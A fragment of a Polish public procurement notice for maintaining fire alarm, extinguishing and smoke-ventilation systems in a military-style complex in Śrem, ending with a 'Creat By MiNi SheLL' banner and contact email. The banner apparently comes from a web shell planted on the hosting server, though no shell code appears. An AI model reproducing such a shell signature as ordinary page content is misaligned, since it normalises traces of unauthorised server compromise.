- urządzeń wentylacji oddymiającej,
- klap i okien dymowych i klap przeciwpożarowych odcinających,
- dźwiękowych systemów ostrzegawczych,
- innych urządzeń pomocniczych współpracujących z instalacją wykrywania i alarmowania 
pożarowego w tym EBI (komunikacja)

Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 14 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.62.51.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas dojazdu awaryjnego - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Konserwacja instalacji przeciwpożarowych  w kompleksie nr 2982
 w m. Śrem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 3. W ramach przedmiotu zamówienia Wykonawca zobowiązany jest do utrzymywania w stałej sprawności technicznej przekazanych w konserwację i serwisowanie :
- instalacji sygnalizacji pożaru,
- stałych systemów i urządzeń gaśniczych,
- urządzeń wentylacji oddymiającej,
- klap i okien dymowych i klap przeciwpożarowych odcinających,
- dźwiękowych systemów ostrzegawczych,
- innych urządzeń pomocniczych współpracujących z instalacją wykrywania i alarmowania 
pożarowego w tym EBI (komunikacja)

Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 14 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.62.51.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. czas dojazdu awaryjnego - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com